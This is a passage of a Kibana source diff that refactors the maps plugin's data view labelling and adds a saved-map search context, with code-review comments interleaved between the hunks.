@@ -220,15 +220,12 @@ export class ESSearchSource extends AbstractESSource implements IMvtVectorSource } async getImmutableProperties(): Promise { - let indexPatternName = this.getIndexPatternId(); let geoFieldType = ''; try { - const indexPattern = await this.getIndexPattern(); - indexPatternName = indexPattern.title; const geoField = await this._getGeoField(); geoFieldType = geoField.type; } catch (error) { - // ignore error, title will just default to id + // ignore error, geoFieldType will just be blank } return [ @@ -238,7 +235,7 @@ export class ESSearchSource extends AbstractESSource implements IMvtVectorSource }, { label: getDataViewLabel(), - value: indexPatternName, + value: await this.getDisplayName(), }, { label: i18n.translate('xpack.maps.source.esSearch.geoFieldLabel', { diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx b/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx index 2c8dca0f1cdf6..51ebe8cc9e042 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/update_source_editor.tsx @@ -47,8 +47,6 @@ interface State { sortFields: DataViewField[] | undefined; supportsClustering: boolean; clusteringDisabledReason: string | null; - supportsMvt: boolean; - mvtDisabledReason: string | null; } export class UpdateSourceEditor extends Component { @@ -58,8 +56,6 @@ export class UpdateSourceEditor extends Component { sortFields: undefined, supportsClustering: false, clusteringDisabledReason: null, - supportsMvt: true, - mvtDisabledReason: null, }; componentDidMount() { 
@@ -111,13 +107,6 @@ export class UpdateSourceEditor extends Component { this.setState({ supportsClustering: supportsGeoTileAgg(geoField), clusteringDisabledReason: getGeoTileAggNotSupportedReason(geoField), - supportsMvt: !geoField.isRuntimeField, - mvtDisabledReason: geoField.isRuntimeField - ? i18n.translate('xpack.maps.source.esSearch.mvtDisableReason', { - defaultMessage: 'Vector tile API does not support runtime {type} field', - values: { type: geoField.type }, - }) - : null, sourceFields, sortFields: indexPattern.fields.filter( (field) => field.sortable && !indexPatterns.isNestedField(field) @@ -228,8 +217,6 @@ export class UpdateSourceEditor extends Component { scalingType={this.props.scalingType} supportsClustering={this.state.supportsClustering} clusteringDisabledReason={this.state.clusteringDisabledReason} - supportsMvt={this.state.supportsMvt} - mvtDisabledReason={this.state.mvtDisabledReason} numberOfJoins={this.props.numberOfJoins} /> diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap index 0c77be62179c2..f8c5951e95e04 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/__snapshots__/scaling_form.test.tsx.snap @@ -34,7 +34,6 @@ exports[`scaling form should disable clusters option when clustering is not supp
{}, scalingType: SCALING_TYPES.LIMIT, supportsClustering: true, - supportsMvt: true, termFields: [], numberOfJoins: 0, }; diff --git a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx index fd0c23a98df45..ccd3b3913a085 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx +++ b/x-pack/plugins/maps/public/classes/sources/es_search_source/util/scaling_form.tsx @@ -35,8 +35,6 @@ interface Props { scalingType: SCALING_TYPES; supportsClustering: boolean; clusteringDisabledReason?: string | null; - supportsMvt: boolean; - mvtDisabledReason?: string | null; numberOfJoins: number; } @@ -188,26 +186,6 @@ export class ScalingForm extends Component { ); } - _renderMvtRadio() { - const radio = ( - this._onScalingTypeSelect(SCALING_TYPES.MVT)} - disabled={!this.props.supportsMvt} - /> - ); - - return this.props.mvtDisabledReason ? ( - - {radio} - - ) : ( - radio - ); - } - _renderClusteringRadio() { const clusteringRadio = ( {
- {this._renderMvtRadio()} + this._onScalingTypeSelect(SCALING_TYPES.MVT)} + /> {this._renderClusteringRadio()} { try { const indexPattern = await this.getIndexPattern(); - return indexPattern.title; + return indexPattern.getName(); } catch (error) { // Unable to load index pattern, just return id as display name return this.getIndexPatternId(); diff --git a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js index 362b2b341714f..c5bce9de0b033 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js +++ b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.test.js @@ -9,7 +9,6 @@ import { ESTermSource, extractPropertiesMap } from './es_term_source'; jest.mock('../../layers/vector_layer', () => {}); -const indexPatternTitle = 'myIndex'; const termFieldName = 'myTermField'; const sumFieldName = 'myFieldGettingSummed'; const metricExamples = [ @@ -33,19 +32,17 @@ describe('getMetricFields', () => { it('should override name and label of count metric', async () => { const source = new ESTermSource({ id: '1234', - indexPatternTitle: indexPatternTitle, term: termFieldName, indexPatternId: 'foobar', }); const metrics = source.getMetricFields(); expect(metrics[0].getName()).toEqual('__kbnjoin__count__1234'); - expect(await metrics[0].getLabel()).toEqual('Count of myIndex'); + expect(await metrics[0].getLabel()).toEqual('Count of foobar'); }); it('should override name and label of sum metric', async () => { const source = new ESTermSource({ id: '1234', - indexPatternTitle: indexPatternTitle, term: termFieldName, metrics: metricExamples, indexPatternId: 'foobar', 
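Review bot: The new expectation `'Count of foobar'` in `es_term_source.test.js` is met only through the fallback branch of `getAggLabel`: `getIndexPattern()` presumably rejects in this test (no data view service is wired up) and the catch substitutes the raw `indexPatternId`. Neither test therefore exercises the path the change actually introduces, where the label comes from `indexPattern.getName()`. Consider stubbing that explicitly, e.g. `source.getIndexPattern = async () => ({ getName: () => 'myIndex' });` and keeping the `'Count of myIndex'` expectation, with one separate case asserting the id fallback when the lookup fails.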
@@ -54,7 +51,7 @@ describe('getMetricFields', () => { expect(metrics[0].getName()).toEqual('__kbnjoin__sum_of_myFieldGettingSummed__1234'); expect(await metrics[0].getLabel()).toEqual('my custom label'); expect(metrics[1].getName()).toEqual('__kbnjoin__count__1234'); - expect(await metrics[1].getLabel()).toEqual('Count of myIndex'); + expect(await metrics[1].getLabel()).toEqual('Count of foobar'); }); }); @@ -114,7 +111,6 @@ describe('getSyncMeta', () => { it('should contain meta requiring source re-fetch when changed', () => { const source = new ESTermSource({ id: '1234', - indexPatternTitle: indexPatternTitle, term: termFieldName, indexPatternId: 'foobar', size: 10, diff --git a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts index 5447910dc524a..71ce42be22ab0 100644 --- a/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts +++ b/x-pack/plugins/maps/public/classes/sources/es_term_source/es_term_source.ts @@ -63,9 +63,6 @@ export class ESTermSource extends AbstractESAggSource implements ITermJoinSource } return { ...normalizedDescriptor, - indexPatternTitle: descriptor.indexPatternTitle - ? descriptor.indexPatternTitle - : descriptor.indexPatternId, term: descriptor.term!, type: SOURCE_TYPES.ES_TERM_SOURCE, }; 
@@ -109,11 +106,18 @@ export class ESTermSource extends AbstractESAggSource implements ITermJoinSource }); } - getAggLabel(aggType: AGG_TYPE, fieldLabel: string): string { + async getAggLabel(aggType: AGG_TYPE, fieldLabel: string): Promise { + let indexPatternLabel: string | undefined; + try { + const indexPattern = await this.getIndexPattern(); + indexPatternLabel = indexPattern.getName(); + } catch (error) { + indexPatternLabel = this._descriptor.indexPatternId; + } return aggType === AGG_TYPE.COUNT ? i18n.translate('xpack.maps.source.esJoin.countLabel', { - defaultMessage: `Count of {indexPatternTitle}`, - values: { indexPatternTitle: this._descriptor.indexPatternTitle }, + defaultMessage: `Count of {indexPatternLabel}`, + values: { indexPatternLabel }, }) : super.getAggLabel(aggType, fieldLabel); } @@ -145,14 +149,14 @@ export class ESTermSource extends AbstractESAggSource implements ITermJoinSource const rawEsData = await this._runEsQuery({ requestId: this.getId(), - requestName: `${this._descriptor.indexPatternTitle}.${this._termField.getName()}`, + requestName: `${indexPattern.getName()}.${this._termField.getName()}`, searchSource, registerCancelCallback, requestDescription: i18n.translate('xpack.maps.source.esJoin.joinDescription', { defaultMessage: `Elasticsearch terms aggregation request, left source: {leftSource}, right source: {rightSource}`, values: { leftSource: `${leftSourceName}:${leftFieldName}`, - rightSource: `${this._descriptor.indexPatternTitle}:${this._termField.getName()}`, + rightSource: `${indexPattern.getName()}:${this._termField.getName()}`, }, }), searchSessionId: searchFilters.searchSessionId, diff --git a/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx b/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx index 64082a85df6b7..0620386fda4c1 100644 --- a/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx 
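Review bot: The try/catch that opens the new `getAggLabel` re-implements `getDisplayName()` from what looks like the shared ES source base (`es_source.tsx` in this same patch does the identical `getIndexPattern().getName()` with the identical fall-back to the id), so one line, `const indexPatternLabel = await this.getDisplayName();`, replaces the six and keeps the two from drifting. The lookup is also awaited for non-count aggregations whose result is never used; moving it inside the `AGG_TYPE.COUNT` branch avoids a data view fetch per metric field. In the second hunk `indexPattern` comes from outside the visible lines, so I am assuming it is the data view resolved earlier in the same method.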
+++ b/x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx @@ -53,6 +53,10 @@ export interface BoundsRequestMeta { applyGlobalTime: boolean; filters: Filter[]; query?: Query; + embeddableSearchContext?: { + query?: Query; + filters: Filter[]; + }; sourceQuery?: Query; timeFilters: TimeRange; timeslice?: Timeslice; diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap index de9d74f68f965..41903e8accafc 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/__snapshots__/join_editor.test.tsx.snap @@ -48,7 +48,6 @@ exports[`Should render join editor 1`] = ` "right": Object { "id": "673ff994-fc75-4c67-909b-69fcb0e1060e", "indexPatternId": "abcde", - "indexPatternTitle": "kibana_sample_data_logs", "metrics": Array [ Object { "label": "web logs count", diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx index cb007110f7d35..1bfe40b555261 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/join_editor.test.tsx @@ -37,7 +37,6 @@ const defaultProps = { leftField: 'iso2', right: { id: '673ff994-fc75-4c67-909b-69fcb0e1060e', - indexPatternTitle: 'kibana_sample_data_logs', term: 'geo.src', indexPatternId: 'abcde', metrics: [ 
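Review bot: `embeddableSearchContext` is added to `BoundsRequestMeta` without a comment, and nothing on the interface says how it relates to the sibling `filters` and `query`, which presumably carry the container-level (dashboard) search. Since the same shape is now threaded through `syncBoundsData` and the embeddable, a one-line note on the field would save the next reader a trip to `map_embeddable.tsx`, e.g. `// query/filters persisted with the saved map itself (mapStateJSON); applied in addition to the container's query/filters when the map is embedded`. Adjust the wording if that reading of the precedence is wrong; the interface is only partly visible here.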
diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx index bbfc9bbb0f302..1eb23dc207cd4 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join.tsx @@ -95,13 +95,7 @@ export class Join extends Component { }); }; - _onRightSourceChange = ({ - indexPatternId, - indexPatternTitle, - }: { - indexPatternId: string; - indexPatternTitle: string; - }) => { + _onRightSourceChange = (indexPatternId: string) => { this.setState({ rightFields: [], loadError: undefined, @@ -113,7 +107,6 @@ export class Join extends Component { right: { ...restOfRight, indexPatternId, - indexPatternTitle, type: SOURCE_TYPES.ES_TERM_SOURCE, } as ESTermSourceDescriptor, }); @@ -183,9 +176,7 @@ export class Join extends Component { const { join, onRemove, leftFields, leftSourceName } = this.props; const { rightFields, indexPattern } = this.state; const right = _.get(join, 'right', {}) as ESTermSourceDescriptor; - const rightSourceName = right.indexPatternTitle - ? right.indexPatternTitle - : right.indexPatternId; + const rightSourceName = indexPattern ? indexPattern.getName() : right.indexPatternId; const isJoinConfigComplete = join.leftField && right.indexPatternId && right.term; let metricsExpression; diff --git a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx index 553e30e3194f3..9e55833698c7d 100644 --- a/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx +++ b/x-pack/plugins/maps/public/connected_components/edit_layer_panel/join_editor/resources/join_expression.tsx 
@@ -26,10 +26,7 @@ import { SingleFieldSelect } from '../../../../components/single_field_select'; import { ValidatedNumberInput } from '../../../../components/validated_number_input'; import { getTermsFields } from '../../../../index_pattern_util'; -import { - getIndexPatternService, - getIndexPatternSelectComponent, -} from '../../../../kibana_services'; +import { getIndexPatternSelectComponent } from '../../../../kibana_services'; import type { JoinField } from '../join_editor'; interface Props { @@ -44,13 +41,7 @@ interface Props { // Right source props rightSourceIndexPatternId: string; rightSourceName: string; - onRightSourceChange: ({ - indexPatternId, - indexPatternTitle, - }: { - indexPatternId: string; - indexPatternTitle: string; - }) => void; + onRightSourceChange: (indexPatternId: string) => void; // Right field props rightValue: string; @@ -81,20 +72,12 @@ export class JoinExpression extends Component { }); }; - _onRightSourceChange = async (indexPatternId?: string) => { + _onRightSourceChange = (indexPatternId?: string) => { if (!indexPatternId || indexPatternId.length === 0) { return; } - try { - const indexPattern = await getIndexPatternService().get(indexPatternId); - this.props.onRightSourceChange({ - indexPatternId, - indexPatternTitle: indexPattern.title, - }); - } catch (err) { - // do not call onChange with when unable to get indexPatternId - } + this.props.onRightSourceChange(indexPatternId); }; _onLeftFieldChange = (selectedFields: Array>) => { diff --git a/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx b/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx index 4601b5c569290..443dd7b47a069 100644 --- a/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx +++ b/x-pack/plugins/maps/public/connected_components/toolbar_overlay/tools_control/tools_control.test.tsx 
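Review bot: `_onRightSourceChange` now forwards the selected id without the `getIndexPatternService().get()` round-trip, so an id whose data view cannot be loaded is no longer filtered out before `onRightSourceChange` fires and goes straight into the join descriptor. That is presumably acceptable because the parent `Join` resets `rightFields` and `loadError` in its own `_onRightSourceChange` and loads the fields itself, but the dropped guard deserves a sentence, e.g. `// the id is validated by the parent when it loads the right-side fields; failures surface through loadError`. Worth confirming that path really reports the failure to the user before relying on it.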
@@ -12,14 +12,6 @@ import { ToolsControl } from './tools_control'; const defaultProps = { initiateDraw: () => {}, cancelDraw: () => {}, - geoFields: [ - { - geoFieldName: 'location', - geoFieldType: 'geo_point', - indexPatternTitle: 'my_index', - indexPatternId: '1', - }, - ], filterModeActive: false, activateDrawFilterMode: () => {}, deactivateDrawMode: () => {}, diff --git a/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx b/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx index d271ee053d8c7..76f6dbbb15133 100644 --- a/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx +++ b/x-pack/plugins/maps/public/embeddable/map_embeddable.tsx @@ -36,6 +36,7 @@ import { setReadOnly, updateLayerById, setGotoWithCenter, + setEmbeddableSearchContext, } from '../actions'; import { getIsLayerTOCOpen, getOpenTOCDetails } from '../selectors/ui_selectors'; import { @@ -48,6 +49,7 @@ import { import { areLayersLoaded, getGeoFieldNames, + getEmbeddableSearchContext, getLayerList, getGoto, getMapCenter, @@ -194,6 +196,21 @@ export class MapEmbeddable forceRefresh: false, }); + const mapStateJSON = this._savedMap.getAttributes().mapStateJSON; + if (mapStateJSON) { + try { + const mapState = JSON.parse(mapStateJSON); + store.dispatch( + setEmbeddableSearchContext({ + filters: mapState.filters ? mapState.filters : [], + query: mapState.query, + }) + ); + } catch (e) { + // ignore malformed mapStateJSON, not a critical error for viewing map - map will just use defaults + } + } + this._unsubscribeFromStore = store.subscribe(() => { this._handleStoreChanges(); }); 
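Review bot: `JSON.parse(mapStateJSON)` yields `any`, so `filters: mapState.filters ? mapState.filters : []` forwards any truthy value — an object or a string from a hand-edited saved object would be dispatched as `Filter[]` and only fail later in consumers; the `catch` only covers syntax errors, not shape. A cheap shape check keeps the defaulting honest: `filters: Array.isArray(mapState.filters) ? mapState.filters : [],`. The unused `e` in `catch (e)` could also be `catch` alone, or the comment could be kept with `catch (_e: unknown)` to make the intentional ignore explicit.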
@@ -249,20 +266,18 @@ export class MapEmbeddable return this._isInitialized ? this._savedMap.getAttributes().description : ''; } - /** - * TODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved - * @returns [] - */ public async getFilters() { - return []; + const embeddableSearchContext = getEmbeddableSearchContext( + this._savedMap.getStore().getState() + ); + return embeddableSearchContext ? embeddableSearchContext.filters : []; } - /** - * TODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved - * @returns undefined - */ public async getQuery() { - return undefined; + const embeddableSearchContext = getEmbeddableSearchContext( + this._savedMap.getStore().getState() + ); + return embeddableSearchContext?.query; } public supportedTriggers(): string[] { diff --git a/x-pack/plugins/maps/public/lazy_load_bundle/index.ts b/x-pack/plugins/maps/public/lazy_load_bundle/index.ts index cbd1b3aa4b4c8..cdf61a6ab9173 100644 --- a/x-pack/plugins/maps/public/lazy_load_bundle/index.ts +++ b/x-pack/plugins/maps/public/lazy_load_bundle/index.ts @@ -51,7 +51,6 @@ export interface LazyLoadedMapModules { termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, }: CreateRegionMapLayerDescriptorParams) => LayerDescriptor | null; diff --git a/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts b/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts index 7116718aa09bd..7c8f39da6a6fe 100644 --- a/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts +++ b/x-pack/plugins/maps/public/legacy_visualizations/region_map/utils.ts 
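Review bot: `getFilters` and `getQuery` do the same lookup but read it in two styles — a ternary in one, optional chaining in the other; `return embeddableSearchContext?.filters ?? [];` matches the `getQuery` form and avoids repeating the variable. The removed TODO doc comments were not replaced; a one-liner such as `/** Filters persisted with the saved map's mapStateJSON, or [] when none were stored. */` would document the new contract. Note also that `getDescription` just above guards on `this._isInitialized` before touching `_savedMap`, while these two call `this._savedMap.getStore()` unguarded — presumably the store exists before initialization completes, but that is worth confirming.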
@@ -29,7 +29,6 @@ export function extractLayerDescriptorParams(vis: Vis) { leftFieldName: vis.params.selectedLayer.isEMS ? vis.params.selectedJoinField.name : undefined, colorSchema: vis.params.colorSchema, indexPatternId: vis.data.indexPattern?.id, - indexPatternTitle: vis.data.indexPattern?.title, metricAgg: 'count', }; diff --git a/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts b/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts index a7caa72c6c5df..68a17b4a0da67 100644 --- a/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts +++ b/x-pack/plugins/maps/public/lens/choropleth_chart/suggestions.ts @@ -9,8 +9,8 @@ import { partition } from 'lodash'; import { i18n } from '@kbn/i18n'; import type { FileLayer } from '@elastic/ems-client'; import type { SuggestionRequest, VisualizationSuggestion } from '@kbn/lens-plugin/public'; +import { IconRegionMap } from '@kbn/chart-icons'; import type { ChoroplethChartState } from './types'; -import { Icon } from './icon'; import { getEmsSuggestion } from './get_ems_suggestion'; /** @@ -72,7 +72,7 @@ export function getSuggestions( valueAccessor: metric.columnId, regionAccessor: bucket.columnId, }, - previewIcon: Icon, + previewIcon: IconRegionMap, }); } } diff --git a/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx b/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx index 54f459c3f7b38..b6e22ce3cb635 100644 --- a/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx +++ b/x-pack/plugins/maps/public/lens/choropleth_chart/visualization.tsx 
@@ -15,9 +15,9 @@ import { ThemeServiceStart } from '@kbn/core/public'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; import { layerTypes } from '@kbn/lens-plugin/public'; import type { OperationMetadata, SuggestionRequest, Visualization } from '@kbn/lens-plugin/public'; +import { IconRegionMap } from '@kbn/chart-icons'; import { getSuggestions } from './suggestions'; import type { ChoroplethChartState } from './types'; -import { Icon } from './icon'; import { RegionKeyEditor } from './region_key_editor'; const REGION_KEY_GROUP_ID = 'region_key'; @@ -41,7 +41,7 @@ export const getVisualization = ({ visualizationTypes: [ { id: 'lnsChoropleth', - icon: Icon, + icon: IconRegionMap, label: CHART_LABEL, groupLabel: i18n.translate('xpack.maps.lens.groupLabel', { defaultMessage: 'Map', @@ -70,7 +70,7 @@ export const getVisualization = ({ getDescription() { return { - icon: Icon, + icon: IconRegionMap, label: CHART_LABEL, }; }, diff --git a/x-pack/plugins/maps/public/locators.ts b/x-pack/plugins/maps/public/locators.ts index b08c68ec96d61..92749605efbb1 100644 --- a/x-pack/plugins/maps/public/locators.ts +++ b/x-pack/plugins/maps/public/locators.ts @@ -186,7 +186,6 @@ export interface MapsAppRegionMapLocatorParams extends SerializableRecord { termsSize?: number; colorSchema: string; indexPatternId?: string; - indexPatternTitle?: string; metricAgg: string; metricFieldName?: string; timeRange?: TimeRange; @@ -219,7 +218,6 @@ export class MapsAppRegionMapLocatorDefinition termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, filters, @@ -237,7 +235,6 @@ export class MapsAppRegionMapLocatorDefinition termsSize, colorSchema, indexPatternId, - indexPatternTitle, metricAgg, metricFieldName, }); diff --git a/x-pack/plugins/maps/public/reducers/map/map.ts b/x-pack/plugins/maps/public/reducers/map/map.ts index d0e77268fd58c..41de8ab0b8b0f 100644 --- a/x-pack/plugins/maps/public/reducers/map/map.ts 
+++ b/x-pack/plugins/maps/public/reducers/map/map.ts @@ -21,6 +21,7 @@ import { MAP_EXTENT_CHANGED, MAP_READY, MAP_DESTROYED, + SET_EMBEDDABLE_SEARCH_CONTEXT, SET_QUERY, UPDATE_LAYER, UPDATE_LAYER_PROP, @@ -313,6 +314,14 @@ export function map(state: MapState = DEFAULT_MAP_STATE, action: Record & { timeslice?: Timeslice; query?: Query; filters: Filter[]; + embeddableSearchContext?: { + query?: Query; + filters: Filter[]; + }; drawState?: DrawState; editState?: EditState; searchSessionId?: string; diff --git a/x-pack/plugins/maps/public/selectors/map_selectors.test.ts b/x-pack/plugins/maps/public/selectors/map_selectors.test.ts index baca2d79b833d..584bdd0160b8c 100644 --- a/x-pack/plugins/maps/public/selectors/map_selectors.test.ts +++ b/x-pack/plugins/maps/public/selectors/map_selectors.test.ts @@ -57,6 +57,7 @@ describe('getDataFilters', () => { const timeFilters = { to: '2001-01-01', from: '2001-12-31' }; const timeslice = undefined; const query = undefined; + const embeddableSearchContext = undefined; const filters: Filter[] = []; const searchSessionId = '12345'; const searchSessionMapBuffer = { @@ -76,6 +77,7 @@ describe('getDataFilters', () => { timeslice, query, filters, + embeddableSearchContext, searchSessionId, searchSessionMapBuffer, isReadOnly @@ -92,6 +94,7 @@ describe('getDataFilters', () => { timeslice, query, filters, + embeddableSearchContext, searchSessionId, undefined, isReadOnly diff --git a/x-pack/plugins/maps/public/selectors/map_selectors.ts b/x-pack/plugins/maps/public/selectors/map_selectors.ts index a069b07d1f2c6..8adb3f8f927ab 100644 --- a/x-pack/plugins/maps/public/selectors/map_selectors.ts +++ b/x-pack/plugins/maps/public/selectors/map_selectors.ts 
@@ -198,6 +198,9 @@ export const getQuery = ({ map }: MapStoreState): Query | undefined => map.mapSt export const getFilters = ({ map }: MapStoreState): Filter[] => map.mapState.filters; +export const getEmbeddableSearchContext = ({ map }: MapStoreState) => + map.mapState.embeddableSearchContext; + export const getSearchSessionId = ({ map }: MapStoreState): string | undefined => map.mapState.searchSessionId; @@ -239,6 +242,7 @@ export const getDataFilters = createSelector( getTimeslice, getQuery, getFilters, + getEmbeddableSearchContext, getSearchSessionId, getSearchSessionMapBuffer, getIsReadOnly, @@ -250,6 +254,7 @@ export const getDataFilters = createSelector( timeslice, query, filters, + embeddableSearchContext, searchSessionId, searchSessionMapBuffer, isReadOnly @@ -262,6 +267,7 @@ export const getDataFilters = createSelector( timeslice, query, filters, + embeddableSearchContext, searchSessionId, isReadOnly, }; diff --git a/x-pack/plugins/maps/tsconfig.json b/x-pack/plugins/maps/tsconfig.json index 57cc09dec4b16..ee28c2be8d31c 100644 --- a/x-pack/plugins/maps/tsconfig.json +++ b/x-pack/plugins/maps/tsconfig.json @@ -32,7 +32,6 @@ { "path": "../../../src/plugins/usage_collection/tsconfig.json" }, { "path": "../../../src/plugins/kibana_react/tsconfig.json" }, { "path": "../../../src/plugins/kibana_utils/tsconfig.json" }, - { "path": "../../../src/plugins/shared_ux/tsconfig.json" }, { "path": "../../../src/plugins/screenshot_mode/tsconfig.json" }, { "path": "../cloud/tsconfig.json" }, { "path": "../features/tsconfig.json" }, diff --git a/x-pack/plugins/monitoring/public/components/table/storage.ts b/x-pack/plugins/monitoring/public/components/table/storage.ts index 7d4d3129650ae..3c28be3fe6114 100644 --- a/x-pack/plugins/monitoring/public/components/table/storage.ts +++ b/x-pack/plugins/monitoring/public/components/table/storage.ts 
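Review bot: `getEmbeddableSearchContext` is the only selector in this hunk without an explicit return type, while its neighbours annotate `Query | undefined` and `Filter[]`; since it is exported, the inferred type leaks whatever `mapState.embeddableSearchContext` happens to be. Annotating it in the same style keeps the file consistent, e.g. `export const getEmbeddableSearchContext = ({ map }: MapStoreState): { query?: Query; filters: Filter[] } | undefined =>`, mirroring the shape the types hunk declares (or `MapState['embeddableSearchContext']` if that type is imported here). `getDataFilters`, which now receives the new value, starts and ends outside the visible hunks.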
@@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get } from 'lodash'; import { Storage } from '@kbn/kibana-utils-plugin/public'; import { STORAGE_KEY } from '../../../common/constants'; diff --git a/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js b/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js index f74fd30fde84b..cb01c182694b4 100644 --- a/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js +++ b/x-pack/plugins/monitoring/public/lib/calculate_shard_stats.js @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, each } from 'lodash'; function addOne(obj, key) { diff --git a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts index d8bf8487cee09..dd69669405098 100644 --- a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts +++ b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_from_request.ts @@ -7,7 +7,7 @@ import { notFound } from '@hapi/boom'; import { get, omit } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { i18n } from '@kbn/i18n'; import { getClustersStats } from './get_clusters_stats'; import { flagSupportedClusters } from './flag_supported_clusters'; diff --git a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js index 6b35012c9d55b..1b9e40e4d6300 100644 --- a/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js +++ b/x-pack/plugins/monitoring/server/lib/cluster/get_clusters_state.test.js 
@@ -7,7 +7,7 @@ import { handleResponse } from './get_clusters_state'; import moment from 'moment'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; const clusters = [ { diff --git a/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js b/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js index a04e53fdbbe9d..9ddcecb0cbbd0 100644 --- a/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js +++ b/x-pack/plugins/monitoring/server/lib/elasticsearch/get_ml_jobs.test.js @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { handleResponse } from './get_ml_jobs'; describe('Get ML Jobs', () => { diff --git a/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js b/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js index d249bc82b9387..915c305d294c7 100644 --- a/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js +++ b/x-pack/plugins/monitoring/server/lib/elasticsearch/nodes/calculate_node_type.test.js @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { calculateNodeType } from './calculate_node_type'; const masterNodeId = 'def456'; diff --git 